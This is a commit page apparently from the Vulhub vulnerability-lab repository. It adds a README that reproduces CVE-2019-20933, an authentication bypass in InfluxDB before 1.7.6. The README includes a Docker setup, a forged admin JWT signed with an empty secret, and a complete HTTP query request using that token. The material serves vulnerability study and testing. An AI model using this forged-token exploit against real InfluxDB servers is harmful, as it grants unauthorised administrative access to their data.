first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
64
influxdb/CVE-2019-20933/README.md
Normal file
64
influxdb/CVE-2019-20933/README.md
Normal file
@@ -0,0 +1,64 @@
|
||||
# InfluxDB Empty JWT Secret Key Authentication Bypass (CVE-2019-20933)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
InfluxDB is an open-source time series database developed by the company InfluxData.
|
||||
|
||||
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in `services/httpd/handler.go` because a JWT token may have an empty SharedSecret (aka shared secret).
|
||||
|
||||
References:
|
||||
|
||||
- https://www.komodosec.com/post/when-all-else-fails-find-a-0-day
|
||||
- https://github.com/influxdata/influxdb/issues/12927
|
||||
- https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
|
||||
- https://docs.influxdata.com/influxdb/v1.7/administration/config/#http-endpoints-settings
|
||||
|
||||
## Vulnerable Environment
|
||||
|
||||
Execute following command to start a InfluxDB 1.6.6:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After server is started, you can see some debug information in `http://your-ip:8086/debug/vars`. But you are unable to execute SQL statement without authencation and a 401 error is responsed:
|
||||
|
||||
|
||||
|
||||
## Vulnerability Reproduce
|
||||
|
||||
We can use <https://jwt.io/> to generate a valid JWT token with an empty secret key:
|
||||
|
||||
```
|
||||
{
|
||||
"alg": "HS256",
|
||||
"typ": "JWT"
|
||||
}
|
||||
{
|
||||
"username": "admin",
|
||||
"exp": 2986346267
|
||||
}
|
||||
```
|
||||
|
||||
Where `username` is the administrator account name, and `exp` is the token expiration time. You should set `exp` to a future time to make it effect:
|
||||
|
||||
|
||||
|
||||
Then take this token to the request, and success to execute SQL statement `show users` in the server:
|
||||
|
||||
```
|
||||
POST /query HTTP/1.1
|
||||
Host: your-ip
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoyOTg2MzQ2MjY3fQ.LJDvEy5zvSEpA_C6pnK3JJFkUKGq9eEi8T2wdum3R_s
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 22
|
||||
|
||||
db=sample&q=show+users
|
||||
```
|
||||
|
||||
|
||||
Reference in New Issue
Block a user